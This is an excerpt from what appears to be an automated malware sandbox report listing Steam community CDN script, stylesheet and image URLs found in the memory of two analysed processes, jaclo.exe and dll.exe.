            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=D1VziU1eIKI3&l=englis
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
            Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
            Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
            Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
            Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=Opxzx_tYaANk&amp
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
            Source: dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
